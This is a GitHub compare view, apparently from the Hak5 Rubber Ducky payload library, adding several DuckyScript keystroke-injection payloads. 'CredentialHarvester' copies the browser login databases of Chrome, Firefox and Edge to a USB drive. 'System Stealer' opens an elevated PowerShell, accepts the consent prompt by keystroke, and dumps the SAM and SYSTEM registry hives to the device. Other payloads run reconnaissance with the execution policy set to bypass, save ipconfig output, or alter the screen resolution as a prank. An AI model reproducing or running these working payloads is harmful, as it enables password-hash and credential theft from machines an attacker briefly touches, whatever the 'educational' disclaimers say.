Compare commits

...

27 Commits

Author SHA1 Message Date
Mark acc8dd6ea8
Merge f843113663 into 44af31e74b 2024-10-27 11:37:09 +01:00
Peaks 44af31e74b
Merge pull request #481 from mavisinator30001/master
Create Resolution_Prank.txt
2024-10-24 15:30:26 -04:00
Mavis Coffey cacb21ad7e
Removed Second "#DRIVELABEL" variable 2024-10-24 14:58:57 -04:00
Mavis Coffey 61eb88ab6c
Update payload.txt 2024-10-22 14:41:32 -04:00
Mavis Coffey 8be0f9a092
Delete payloads/library/credentials/IP-Out directory 2024-10-21 11:57:10 -04:00
Mavis Coffey 63e0c18618
Create README.md 2024-10-21 11:56:43 -04:00
Mavis Coffey 81807425f5
Create payload.txt 2024-10-21 11:56:10 -04:00
Mavis Coffey 083951025f
Added System-Stealer to exfiltration library 2024-10-18 14:43:32 -04:00
Mavis Coffey 1a5aa0bd08
Update payload.txt 2024-10-18 11:26:00 -04:00
Mavis Coffey a323fc3281
Update payload.txt 2024-10-15 14:10:08 -04:00
Mavis Coffey 420a174f93
Rename readme.md to README.md 2024-09-26 07:42:38 -07:00
Mavis Coffey c8c6a75d33
Rename readme.md to README.md 2024-09-26 07:42:03 -07:00
Mavis Coffey 4e89426355
Create readme.md 2024-09-26 06:29:23 -07:00
Mavis Coffey 566683c428
Update payload.txt 2024-09-26 06:25:51 -07:00
Mavis Coffey 5ed41467e3
Update payload.txt 2024-09-26 06:24:22 -07:00
Mavis Coffey a74d21e848
Create readme.md 2024-09-26 06:16:19 -07:00
Mavis Coffey 0f85a6936e
Update payload.txt 2024-09-26 06:09:19 -07:00
Mavis Coffey d9baab6395
Merge branch 'hak5:master' into master 2024-09-26 09:05:47 -04:00
Mavis Coffey cf0c83d37c
Update and rename Resolution_Prank.txt to payload.txt
Changed author name to my username rather than real name. Changed payload file name to payload.txt
2024-09-20 08:30:00 -07:00
Mavis Coffey 8293bf5d4d
Update payload.txt
Changed author comment to display my username rather than my real name
2024-09-20 08:28:44 -07:00
Mavis Coffey 6ad0b7836c
Create payload.txt
Added IP-Out Ducky payload
2024-09-20 08:25:58 -07:00
mavisinator30001 8073d4d9cd
Create Resolution_Prank.txt
Added Resolution_Prank folder and related payload into said folder
2024-09-18 07:30:59 -07:00
Mark f843113663
Update Payload.txt 2024-05-31 09:31:35 -04:00
Mark 81260982f1
Rename CredentialHarvester.txt to Payload.txt 2024-05-28 23:39:23 -04:00
Mark 582bb6138a
Rename VulnerabilityScanner.txt to Payload.txt 2024-05-28 23:38:47 -04:00
Mark 5b5c57f16b
Create VulnerabilityScanner.txt 2024-05-28 23:38:24 -04:00
Mark ddd7d2af4b
Create CredentialHarvester.txt 2024-05-28 23:34:46 -04:00
7 changed files with 949 additions and 0 deletions

View File

@ -0,0 +1,63 @@
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Title: CredentialHarvester %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Author: github.com/markcyber %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Description: This script exfiltrates credentials %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Target: Firefox, Chrome, Edge on Windows Machines %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Category: Exfiltration %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% This script requires a secondary USB named "MYUSB" to save credentials to %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM Open PowerShell with elevated privileges
DELAY 1000
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 1500
REM Check if the USB drive exists
STRING $usbDrive = Get-WmiObject Win32_Volume ^| Where-Object { $_.Label -eq 'MYUSB' } ^| Select-Object -ExpandProperty DriveLetter;
ENTER
DELAY 500
STRING if ($usbDrive -ne $null) {
ENTER
DELAY 500
STRING cd $usbDrive
ENTER
DELAY 500
STRING mkdir BrowserData
ENTER
DELAY 500
STRING cd BrowserData
ENTER
DELAY 500
REM Copy Chrome Login Data to USB
STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"
ENTER
STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData" }
ENTER
DELAY 500
REM Copy Firefox Login Data to USB
STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\"
ENTER
STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData" }
ENTER
DELAY 500
REM Copy Edge Login Data to USB
STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"
ENTER
STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData" }
ENTER
DELAY 500
STRING }
ENTER
DELAY 500
REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC)
STRING echo off ^| clip
ENTER
DELAY 500
REM Close PowerShell
STRING exit
ENTER
DELAY 500

View File

@ -0,0 +1,12 @@
# IP-OUT
This is a USB Rubber Ducky payload that opens a powershell window in the target (Windows based) computer, then extracts the `ipconfig` information in the form of a text file saved on the USB.
## Useful Tips
**Change #DRIVELABEL to your own personal drive label if it isn't already**
Remember: Do not use this for unethical hacking practices! This is for educational purposed only!

View File

@ -0,0 +1,63 @@
REM Title: IP-Out
REM Author: Mavisinator30001
REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
REM Target: Any Windows System
REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
DEFINE #DRIVELABEL DUCKY
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
IF $_OS != WINDOWS
STOP_PAYLOAD
END_IF
ATTACKMODE HID STORAGE
DELAY 500
GUI r
DELAY 300
STRINGLN Powershell
DELAY 1000
STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }
WAIT_FOR_STORAGE_ACTIVITY
WAIT_FOR_STORAGE_INACTIVITY
ALT F4
ATTACKMODE OFF
HIDE_PAYLOAD

View File

@ -0,0 +1,74 @@
REM TITLE System Stealer
REM AUTHOR mavisinator30001
REM DESCRIPTION Creates a file in the Duck called sam.save and system.save with encrypted system information in both
REM DISCLAIMER Neither I, nor Hak5, condone any unethical hacking practices, whether taken from this payload or otherwise!
REM DISCLAIMER This is for educational purposes ONLY
DELAY 1000
ATTACKMODE HID STORAGE
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Change $DRIVELABEL to the storage label of your duck
DEFINE #DRIVELABEL DUCKY
IF ($_OS == WINDOWS) THEN
GUI r
DELAY 500
STRING powershell
DELAY 1000
CTRL-SHIFT-ENTER
DELAY 750
LEFT
ENTER
DELAY 1000
STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter
DELAY 250
STRINGLN reg save HKLM\sam $DriveLetter/sam.save
WAIT_FOR_STORAGE_ACTIVITY
WAIT_FOR_STORAGE_INACTIVITY
STRINGLN reg save HKLM\system $DriveLetter/system.save
WAIT_FOR_STORAGE_ACTIVITY
WAIT_FOR_STORAGE_INACTIVITY
ALT F4
ELSE
ATTACKMODE OFF
STOP_PAYLOAD
END_IF

View File

@ -0,0 +1,5 @@
# Resolution Prank
This payload will go into windows based systems and change the resolution of the victim to the lowest possible setting. When finished, the LED will flash red and green, and at that point if you hit CAPS it will reset the monitor to the highest resolution allowed.
### Somewhat resource dependent, may not work on older computers

View File

@ -0,0 +1,103 @@
REM TITLE Resolution Prank
REM AUTHOR Mavisinator30001
REM TARGET Any system running Windows 10/11
REM DESCRIPTION Goes into Windows settings and change the screen resolution. When finished, toggle caps to change display back
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
IF $_OS != WINDOWS
STOP_PAYLOAD
END_IF
LED_G
DELAY 500
CTRL GUI d
DELAY 500
GUI i
DELAY 2000
STRINGLN display
DELAY 2500
TAB
ENTER
DELAY 200
REPEAT 8 TAB
ENTER
VAR $CAPS_STATE = $_CAPSLOCK_ON
WHILE ($CAPS_STATE == $_CAPSLOCK_ON)
HOLD DOWN
DELAY 1000
RELEASE DOWN
ENTER
DELAY 200
LEFT
DELAY 200
ENTER
REM WHEN FINISHED WITH THE FIRST PART OF THE PAYLOAD DUCK WILL FLASH LED
VAR $LIGHT_UP_TIMES = 20
WHILE ($LIGHT_UP_TIMES > 0)
LED_G
DELAY 300
LED_OFF
DELAY 300
LED_R
DELAY 300
LED_OFF
DELAY 300
$LIGHT_UP_TIMES = $LIGHT_UP_TIMES - 1
END_WHILE
WAIT_FOR_CAPS_CHANGE
END_WHILE
DELAY 300
REPEAT 12 TAB
ENTER
DELAY 200
HOLD UP
DELAY 1000
RELEASE UP
ENTER
DELAY 200
LEFT
ENTER
DELAY 1000
ALT F4
DELAY 200
CTRL GUI F4

View File

@ -0,0 +1,629 @@
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Title: VulnerabilityScanner %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Author: Github.com/MarkCyber %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Description: This script scans for vulnerabilities %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Target: Windows machines with admin access %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Category: Recon %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% This script requires a secondary USB named "MYUSB" to save credentials to %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
DELAY 1000
REM Open Start Menu
CONTROL ESCAPE
DELAY 2000
STRING powershell
REM Navigate to the context menu to run PowerShell as an administrator
DELAY 500
RIGHTARROW
DELAY 100
DOWNARROW
DELAY 100
ENTER
DELAY 3000
ALT Y
DELAY 5000
REM Set PowerShell Execution Policy to Bypass
DELAY 1000
STRING set-executionpolicy bypass -scope process -force
DELAY 200
ENTER
DELAY 200
REM Create the PowerShell script in memory and execute it
DELAY 200
STRING $usbName = "MYUSB"
DELAY 200
ENTER
DELAY 200
STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter
DELAY 200
ENTER
DELAY 200
STRING if ($usbDrive) {
DELAY 200
ENTER
DELAY 200
STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName
DELAY 200
ENTER
DELAY 200
STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner
DELAY 200
ENTER
DELAY 200
STRING New-Item -ItemType Directory -Path $directoryPath
DELAY 200
ENTER
DELAY 200
STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt"
DELAY 200
ENTER
DELAY 200
STRING "" > $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING function check-passwordpolicy {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING net accounts
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking password policy: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function audit-services {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-service | select-object name, displayname, status, starttype
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error auditing services: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-networksettings {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-netipconfiguration
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking network settings: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-softwarevulnerabilities {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking software vulnerabilities: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-cve {
DELAY 200
ENTER
DELAY 200
STRING param (
DELAY 200
ENTER
DELAY 200
STRING [string]$productname,
DELAY 200
ENTER
DELAY 200
STRING [string]$version
DELAY 200
ENTER
DELAY 200
STRING )
DELAY 200
ENTER
DELAY 200
STRING $initialDelay = 2
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version"
DELAY 200
ENTER
DELAY 200
STRING start-sleep -seconds $initialDelay
DELAY 200
ENTER
DELAY 200
STRING $response = invoke-restmethod -uri $uri -method get
DELAY 200
ENTER
DELAY 200
STRING if ($response.totalresults -gt 0) {
DELAY 200
ENTER
DELAY 200
STRING foreach ($cve in $response.result.cve_items) {
DELAY 200
ENTER
DELAY 200
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING } else {
DELAY 200
ENTER
DELAY 200
STRING "no cves found for $productname $version"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking CVEs: $_"
DELAY 200
ENTER
DELAY 200
STRING if ($_.Exception -match '403') {
DELAY 200
ENTER
DELAY 200
STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..."
DELAY 200
ENTER
DELAY 200
STRING start-sleep -seconds 60
DELAY 200
ENTER
DELAY 200
STRING $retryResponse = invoke-restmethod -uri $uri -method get
DELAY 200
ENTER
DELAY 200
STRING if ($retryResponse.totalresults -gt 0) {
DELAY 200
ENTER
DELAY 200
STRING foreach ($cve in $retryResponse.result.cve_items) {
DELAY 200
ENTER
DELAY 200
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING } else {
DELAY 200
ENTER
DELAY 200
STRING "no cves found for $productname $version"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function analyze-logs {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-eventlog -logname system -newest 100
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error analyzing logs: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-openports {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING netstat -an
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking open ports: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-missingupdates {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING write-output "Checking Windows Update logs..."
DELAY 200
ENTER
DELAY 200
STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log"
DELAY 200
ENTER
DELAY 200
STRING Get-WindowsUpdateLog -LogPath $updateLogPath
DELAY 200
ENTER
DELAY 200
STRING write-output "WindowsUpdate.log written to $updateLogPath"
DELAY 200
ENTER
DELAY 200
STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error getting Windows Update log: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-firewallstatus {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING netsh advfirewall show allprofiles
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking firewall status: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-smbv1status {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-windowsoptionalfeature -online -featurename smb1protocol
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking SMBv1 status: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-antivirusstatus {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-mpcomputerstatus
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking antivirus status: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING check-passwordpolicy >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING audit-services >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-networksettings >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-softwarevulnerabilities >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING analyze-logs >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-openports >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-missingupdates >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-firewallstatus >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-smbv1status >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-antivirusstatus >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
REM Dynamically identify critical software from running processes and scheduled tasks
STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique
DELAY 200
ENTER
DELAY 200
STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique
DELAY 200
ENTER
DELAY 200
REM Combine running software and scheduled tasks
STRING $softwareList = @()
DELAY 200
ENTER
DELAY 200
STRING foreach ($process in $runningSoftware) {
DELAY 200
ENTER
DELAY 200
STRING $softwareList += $process.Name
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING foreach ($task in $scheduledTasks) {
DELAY 200
ENTER
DELAY 200
STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun)
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
REM Remove duplicates and empty entries
STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" }
DELAY 200
ENTER
DELAY 200
REM Check CVEs for identified software
STRING foreach ($software in $softwareList) {
DELAY 200
ENTER
DELAY 200
STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion
DELAY 200
ENTER
DELAY 200
STRING if ($version) {
DELAY 200
ENTER
DELAY 200
STRING check-cve -productname $software -version $version >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10)
DELAY 200
ENTER
DELAY 200
STRING start-sleep -seconds $initialDelay
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING write-output "Results saved to USB drive."
DELAY 200
ENTER
DELAY 200
STRING } else {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error: USB drive MYUSB not found."
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING invoke-command -scriptblock $script
DELAY 200
ENTER
DELAY 20000